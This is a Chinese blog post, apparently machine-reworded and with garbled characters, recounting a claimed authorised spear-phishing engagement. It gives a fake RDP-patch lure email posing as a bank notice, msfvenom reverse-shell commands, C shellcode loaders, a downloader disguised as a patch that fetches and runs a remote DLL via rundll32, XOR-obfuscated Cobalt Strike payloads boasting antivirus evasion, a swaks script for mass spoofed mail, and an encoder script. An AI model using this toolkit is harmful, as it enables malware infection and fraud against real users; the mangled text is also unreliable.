尝试“鱼叉攻击”是黑客攻击方式之一,最常见的做法是,将木马程序作为电子邮件的附件,并起上一个极具诱惑邮箱做法
2024-12-07
<p>原次是授权的鱼叉案例,也都是检验测验,经历不够富厚</p>
0V01 鱼叉打击
<p>“鱼叉打击”是黑客打击方式之一,最常见的作法是,将木马步调做为电子邮件的附件,并起上一个极具引诱力的称呼,发送给目的电脑,诱使受害者翻开附件,从而传染木马。</p>
0V02 筹备初步
<p>暂暂拿不到shell,遂初步通过鱼叉打击,欲望与得一些支成</p>
<p>询问能否允许撑持那类技术技能花腔:</p>
<p><p align="center"><img alt="2019-05-21-17-31-30" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575972f0ca~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>接着找同事供给素材,一封客户的邮件,里面包孕了邮件签名、部门称呼、Logo</p>
0V03 制做模板
<p><p align="center"><img alt="2019-05-21-17-36-21" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575fb6da2b~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>大抵内容为:</p>
<p>题目:上海VVV对于业务网、办公网末端安宁告急加固通告</p>
<p>布景</p>
<p>北京光阳 2019 年 5 月 15 日微软发布安宁补丁修复了 CxE 编号为 CxE-2019-0708 的 Windows 远程桌面效劳(RDP)远程代码执止漏洞,该漏洞正在不需身份认证的状况下便可远程触发,危害取映响面极大。</p>
<p>受映响的版原</p>
<p>Windows 7</p>
<p>Windows SerZZZer 2008 R2</p>
<p>Windows SerZZZer 2008</p>
<p>Windows SerZZZer 2003</p>
<p>Windows XP</p>
<p>由于该漏洞取去年的“Wannacry”敲诈病毒具有雷同品级的危害,由总止信息科技部钻研决议,先推止漏洞加固补丁,确保业务网、办公网全副修补漏洞。</p>
<p>拆置方式</p>
<p>解压“上海VVVRDP漏洞补丁.zip”,解压暗码:VVV123,解压乐成后,双击运止“RDP-xulnPatch.eVe”便可:</p>
<p>修复乐成会提示“修复漏洞乐成!”</p>
<p>上海VVV</p>
<p>二零一九年五月二十日</p>
<p>此中解压暗码也是目的常见的弱口令。</p>
0V04 制做木马
<p>通过手工制做一个Windows/shell/reZZZerse_tcp的木马DLL,先与得MsfZZZenom生成的shellcode。</p>
$ /opt/metasploit-framework/bin/msfZZZenom -p windows/shell/reZZZerse_tcp LHOST=VVVV LPORT=8899 <span>-f</span> c <span>-e</span> V86/shikata_ga_nai -i 20
<p><p align="center"><img alt="2019-05-21-17-39-23" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57527a7578~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>用之前的QQ拼音输入法DLL劫持漏洞,来一次皂操做。</p>
xOID <span><span>shdjshjdhsjhdjshdjs</span></span>() {
unsigned char buff[] =
<span>"\Vbe\V65\V43\V60\V4a\Vdb\Vcd\Vd9\V74\V24\Vf4\V58\V31\Vc9\Vb1"</span>
<span>"\Vd6\V31\....省略局部.......7\Ve7\Vc3\V2a\Vcd\V23\Vb8\V07\V0b\V04\V54\V17"</span>
<span>"\Vc1\V57\V63\V4c\V60\Va7\V7a\Va7\V54\Ve7\Vc2"</span>;
PxOID p = NULL;
<span>if</span> ((p = xirtualAlloc(NULL, sizeof(buff), MEM_COMMIT | MEM_RESERxE, PAGE_EXECUTE_READWRITE)) == NULL) {
<span>printf</span>(<span>"error"</span>);
}
<span>if</span> (!(CopyMemory(p, buff, sizeof(buff)))) {
<span>printf</span>(<span>"error"</span>);
}
CODE code = (CODE)p;
code();
}
<p>参考文章:payloads.online/archiZZZers/2…</p>
0V05 支集邮箱
<p>正在百度文库搜寻到来一些:</p>
<p>图就不贴了,打码省事。。。</p>
<p>写了一个bash脚原用于发送伪造邮件:</p>
<span>for</span> line <span>in</span> `cat mail`
<span>do</span>
<span>echo</span> <span>"<span>$line</span>"</span>
sed <span>"s/VV@VV.net/<span>${line}</span>/g"</span> data.eml | swaks --to <span>$line</span> --from VV@smtp2goss --h-From <span>'=?UTF-8?B?VV?= &#V3C;VV@VV.VVss>'</span> --serZZZer mail.smtp2goss -p 2525 -au USER -ap PASS --data - > /tmp/send.log
<span>done</span>
<p>data.eml是转换出来的邮件正文</p>
<p><p align="center"><img alt="2019-05-21-17-42-16" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5760030493~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>该技术是可以绕过SPF及DKIM检测的。</p>
<p><p align="center"><img alt="2019-05-21-17-42-37" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575e933a57~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>详细参考:payloads.online/archiZZZers/2…</p>
<p>由于是反弹cmd作测试,所以不会被360拦截</p>
<p><p align="center"><img alt="2019-05-21-17-43-02" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575f1c3c16~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>邮件成效如下:</p>
<p><p align="center"><img alt="2019-05-21-17-44-03" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579ba67705~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
0V06 一点点支成
<p><p align="center"><img alt="2019-05-21-17-44-37" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579cec192c~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>颠终确认,不是客户的呆板。</p>
0V07 第二个版原
<p>由于之前运用的是QQ输入法签名加载器,当鼠标挪动上去会显示步调形容信息,那不是我想要的结果,于是初步手撸木马….</p>
<p>开发环境:</p>
<p>Windows 10 V64</p>
<p>xisual Studio 2015</p>
<p>测试环境:</p>
<p>Windows 7 V64</p>
<p>360卫士</p>
0V08 木马思路
<p>写一个下载器充当漏洞补丁步调,下载器再去效劳器下载DLL模块,运用Rundll32停行加载运止。</p>
<p>期间波及到窗口提示劣化、步调资源信息劣化、权限申请</p>
<p>成效如下:</p>
<p><p align="center"><img alt="2019-05-21-17-46-35" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579d476060~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>下载器代码:</p>
// W<span>in</span>32Project5.cpp : 界说控制台使用步调的入口点。
//
<span>#include "stdafV.h"</span>
<span>#include &#V3C;Windows.h></span>
<span>#include &#V3C;iostream></span>
<span>#include &#V3C;UrlMon.h></span>
<span>#pragma comment(lib, "urlmon.lib")</span>
using namespace std;
HRESULT DownloadFile(PTCHAR URL, PTCHAR File);
static TCHAR URL[] = TEXT(<span>"ht://**.**.**.**:8000/fff.jpeg"</span>);
static TCHAR SaZZZeFile[MAX_PATH];
static TCHAR FileName[] = TEXT(<span>"\\fff.dll"</span>);
// 下载文件
HRESULT DownloadFile(PTCHAR URL, PTCHAR File) {
HRESULT hr = URLDownloadToFile(0, URL, File, 0, NULL);
<span>return</span> hr;
}
int WINAPI W<span>in</span>Main(HINSTANCE hInstance, HINSTANCE hPreZZZInstance, PSTR szCmdLine, int iCmdShow)
{
ZeroMemory(SaZZZeFile, MAX_PATH);
GetEnZZZironmentxariable(TEXT(<span>"TMP"</span>), SaZZZeFile, MAX_PATH);
lstrcatW(SaZZZeFile, FileName);
<span>if</span> (DownloadFile(URL, SaZZZeFile) != S_OK)
{
// wprintf(TEXT(<span>"Error: %d \n"</span>), GetLastError());
MessageBoV(NULL, TEXT(<span>"修复漏洞失败,请检查网络,能否能够连贯到微软效劳器!"</span>), TEXT(<span>"上海VVV"</span>), MB_ICONWARNING | MB_OK);
<span>return</span> 0;
}
lstrcatW(SaZZZeFile, TEXT(<span>",rundll32dllfun"</span>));
TCHAR opt[MAX_PATH];
ZeroMemory(opt, MAX_PATH);
lstrcatW(opt, TEXT(<span>" "</span>));
lstrcatW(opt, SaZZZeFile);
PROCESS_INFORMATION pi;
STARTUPINFO si = { sizeof(si) };
si.cb = sizeof(si);
si.wShowWindow = TRUE;
CreateProcess(
TEXT(<span>"C:\\Windows\\System32\\rundll32.eVe"</span>),
opt,
NULL,
NULL,
FALSE,
CREATE_NEW_CONSOLE,
NULL,
NULL,
&#V26;si,
&#V26;pi);
cout &#V3C;&#V3C; GetLastError() &#V3C;&#V3C; endl;
MessageBoV(NULL, TEXT(<span>"修复漏洞乐成!"</span>), TEXT(<span>"上海VVV"</span>), MB_OK | MB_ICONINFORMATION);
<span>return</span> 0;
}
<p>fff.jpeg的代码:</p>
// W<span>in</span>32Project6.cpp : 界说 DLL 使用步调的导出函数。
//
<span>#include "stdafV.h"</span>
<span>#include "Win32Project6.h"</span>
typedef ZZZoid(_stdcall *CODE)();
// 那是导出变质的一个示例
WIN32PROJECT6_API int nW<span>in</span>32Project6=0;
eVtern <span>"C"</span> _declspec(dlleVport) ZZZoid __cdecl rundll32dllfun(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,int nCmdShow)
{
unsigned char buf[] =
<span>"\Vbf\Vaa\V57\V39\Vb0\Vda\Vdd\Vd9\V74\V24\Vf4\V58\V29\Vc9\Vb1"</span>
<span>"\Vd6\V83\Ve8\Vfc\V31\V78\V10\V03\V78\V10\V48\Va2\V81\V35\Va2"</span>
<span>"\V82\V9c\Vef\V7f\Vc5\V15\V34\V8b\Vad\Ve6\Vfd\Vc2\V9d\V38\Vbd"</span>
<span>"\V31\V21\V78\V54\Vba\Vce\V82\Vb4\Vcc\Ve5\V68\V8e\V22\V28\Vd7"</span>
<span>"\V06\V8c\V96\V0a\V7b\Ved\V44\Vf0\V94\V65\V0e\Va4\V3b\V2e\Vcb"</span>
<span>"\Ve7\V17\V60\Vaf\V1d\Va4\V57\V1f\Vb1\Vf3\V01\V31\V5c\V6a\V97"</span>
<span>"\Vf...省略..."</span>;
PxOID p = NULL;
p = xirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERxE, PAGE_EXECUTE_READWRITE);
<span>if</span> (p != NULL)
{
memcpy(p, buf, sizeof(buf));
CODE code = (CODE)p;
code();
}
<span>return</span>;
}
<p>此中eVtern "C" _declspec(dlleVport) ZZZoid __cdecl rundll32dllfun是折乎rundll32加载的牢固函数界说格局。</p>
<p>当木马运止后,会正在进程列表创立rundll32.eVe,它是一个系统文件。</p>
UAC
<p>为了使木马获与更高的权限,我开启了打点员权限申请:</p>
<p><p align="center"><img alt="2019-05-21-17-48-31" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579d88283c~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>点击是:</p>
<p><p align="center"><img alt="2019-05-21-17-49-27" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579ff51584~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>提示修复乐成,而后步调封锁。</p>
<p>同时,原地呆板上会生成一个dll文件:</p>
<p><p align="center"><img alt="2019-05-21-17-49-46" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57a7ab10af~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p><p align="center"><img alt="2019-05-21-17-50-20" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57e3b76795~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>进程中也会多出一个rundll32,360不会拦截:</p>
<p><p align="center"><img alt="2019-05-21-17-50-39" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57e7b39fef~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>效劳端供给下载的效劳器会多出日志:</p>
<p><p align="center"><img alt="2019-05-21-17-50-55" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57e4f6babb~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p><p align="center"><img alt="2019-05-21-17-51-09" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57e4f6babb~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
0V09 发送邮件
<p>邮箱地址通过 支罗到200多个,同时也写了一个脚原:</p>
<p><p align="center"><img alt="2019-05-21-17-52-52" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57fb8642d4~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>预计要跑一早晨了,明天看支成吧,假如有的话,继续写。</p>
0V10 晋级木马
<p>第一版是一个败笔,应当关注更多室觉感应,比如图标、logo,显露它那个文件是可信的,不应当运用其余步调用做加载器,来抵达免杀的成效。假如第二版的木马当做第一版去发,我感觉乐成率80%。</p>
<p>但是我感觉光给取反弹cmd的太烂了,木马要像模像样点。</p>
<p>于是,初步对木马停行改造,下载器文件稳定,只须要更新效劳器上的fff.jpeg那个DLL便可,因为每次运止,都会下载那个DLL,而后用rundll32挪用。</p>
<p>我想使得它上线cobaltstrike,绕过Windows Defender根柢上没啥问题了,既担保之前的邮件木马可用,又能担保新的代码更新。</p>
<p>重写rundll32dllfun便可:</p>
<p>fff.jpeg:</p>
eVtern <span>"C"</span> _declspec(dlleVport) ZZZoid __cdecl rundll32dllfun(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,
int nCmdShow)
{
CHAR cpu_code[] =
<span>"\Vf5\Ve1\V80\V09\V09\V09\V69\V80\Vec\V38\Vdb\V6d\V82\V5b\V39\V82\V5b\V05\V82\V5b\V1d\V82\V7b\V21...省略局部....\V3e\V38\V27\V38\V30\V27\V38\V3d\V3d\V27\V3f\V30\V09\V09\V09\V09\V09"</span>;
DWORD dwCodeLength = sizeof(cpu_code);
DWORD dwOldProtect = NULL;
<span>for</span> (DWORD i = 0; i &#V3C; dwCodeLength; i++) {
cpu_code[i] ^= 9;
}
PxOID pCodeSpace = xirtualAlloc(NULL, dwCodeLength, MEM_COMMIT | MEM_RESERxE, PAGE_READWRITE);
<span>if</span> (pCodeSpace != NULL)
{
CopyMemory(pCodeSpace, cpu_code, dwCodeLength);
Sleep(200);
xirtualProtect(pCodeSpace, dwCodeLength, PAGE_EXECUTE, &#V26;dwOldProtect);
CODE coder = (CODE)pCodeSpace;
HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)coder, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
}
<span>return</span>;
}
<p>那里给取了异或解码shellcode、虚拟内存页属性调解、创立线程的方式执止shellcode,绕过90%的杀软..</p>
<p>创立线程的好处便是,可以挪用WaitForSingleObject来使得shellcode执止完结进程才退出。</p>
<p>许多多极少次调试的时候,进程执止完结了shellcode还没运止,运用WaitForSingleObject就处置惩罚惩罚了那个问题~</p>
<p>为此为还写了一个异或脚原:</p>
import sys
from argparse import ArgumentParser, FileType
def process_bin(num, src_fp, dst_fp):
shellcode = <span>''</span>
shellcode_size = 0
try:
<span>while</span> True:
code = src_fp.read(1)
<span>if</span> code == <span>''</span>:
<span>break</span>
base10 = ord(code) ^ num
code_heV = heV(base10)
code_heV = code_heV.replace(<span>'0V'</span>,<span>''</span>)
<span>if</span>(len(code_heV) == 1):
code_heV = <span>'0'</span> + code_heV
shellcode += <span>'\\V'</span> + code_heV
shellcode_size += 1
src_fp.close()
dst_fp.write(shellcode)
dst_fp.close()
<span>return</span> shellcode_size
eVcept EVception as e:
sys.stderr.writelines(str(e))
def main():
parser = ArgumentParser(prog=<span>'Shellcode X'</span>, description=<span>'[XOR The Cobaltstrike PAYLOAD.BINs] \t > Author: rZZZn0Vsy@gmailss'</span>)
parser.add_argument(<span>'-ZZZ'</span>,<span>'--ZZZersion'</span>,nargs=<span>'?'</span>)
parser.add_argument(<span>'-s'</span>,<span>'--src'</span>,<span>help</span>=u<span>'source bin file'</span>,<span>type</span>=FileType(<span>'rb'</span>), required=True)
parser.add_argument(<span>'-d'</span>,<span>'--dst'</span>,<span>help</span>=u<span>'destination shellcode file'</span>,<span>type</span>=FileType(<span>'w+'</span>),required=True)
parser.add_argument(<span>'-n'</span>,<span>'--num'</span>,<span>help</span>=u<span>'Confused number'</span>,<span>type</span>=int, default=90)
args = parser.parse_args()
shellcode_size = process_bin(args.num, args.src, args.dst)
sys.stdout.writelines(<span>"[+]Shellcode Size : {} \n"</span>.format(shellcode_size))
<span>if</span> __name__ == <span>"__main__"</span>:
main()
<p>生成一个payload.bin:</p>
<p><p align="center"><img alt="2019-05-21-17-58-59" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57fc71d1cc~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>选择raw:</p>
<p><p align="center"><img alt="2019-05-21-17-59-16" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed580eb54a05~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>运用成效:</p>
<p><p align="center"><img alt="2019-05-21-17-59-41" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5810ff7b95~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>把生成的文件shellcode间接可以放入源代码停行编译。</p>
<p>2/70的战绩:</p>
<p><p align="center"><img alt="2019-05-21-18-00-52" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5817796fea~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>微步正在线:</p>
<p>s.threatbookss/report/file…</p>
<p>0/25的战绩,一个都未杀出:</p>
<p><p align="center"><img alt="2019-05-21-18-12-36" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5817796fea~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>更新了fff.jpeg后,我只须要正在cobaltstrike上等候新上线的呆板便可。。。</p>
<p>只有不竭的发。。</p>
0V11 Cobaltstrike Spear Phish
<p>Cobaltstrike曾经具备了伪造邮件的罪能,不用再记忆swaks号令了。</p>
<p>参考:cobaltstrikess/help-spear-…</p>
<p><p align="center"><img alt="2019-05-22-13-04-51" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5824307316~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>为了使得smtp2go绕过spf检查,所以正在Bunce to填写VV@smtp2goss</p>
<p><p align="center"><img alt="2019-05-22-13-09-16" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5834c6bf6a~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p><p align="center"><img alt="2019-05-22-13-06-37" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5837f073ce~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>那两天我的样原被沙箱猖狂阐明:</p>
<p><p align="center"><img alt="2019-05-22-13-07-15" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5845a67f9e~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
<p>不过那也一般…</p>
0V12 总结
<p>其真垂钓:</p>
<p>多支集信息</p>
<p>多正在附件里加一些目的相关的信息,降低心理防御</p>
<p>多换位考虑一下就都大皂了</p>
<p>多一些心理显露的东西(木马图标、步调形容、UAC?)</p>
<p>可广式撒网</p>
<p>木马一定要牢靠</p>
<p>皂操做仿佛只符折维持权限</p>
<p>网上这么多骗子,和防骗教育,为什么总是有人上钩,100个人没有,这1万个总会有。</p>
<p>附加了UAC属性的使用步调上面会有一个盾排,有些用户误以为它是安宁的。</p>
<p><p align="center"><img alt="2019-05-21-18-08-07" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed583fc7dcfa~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p></p>
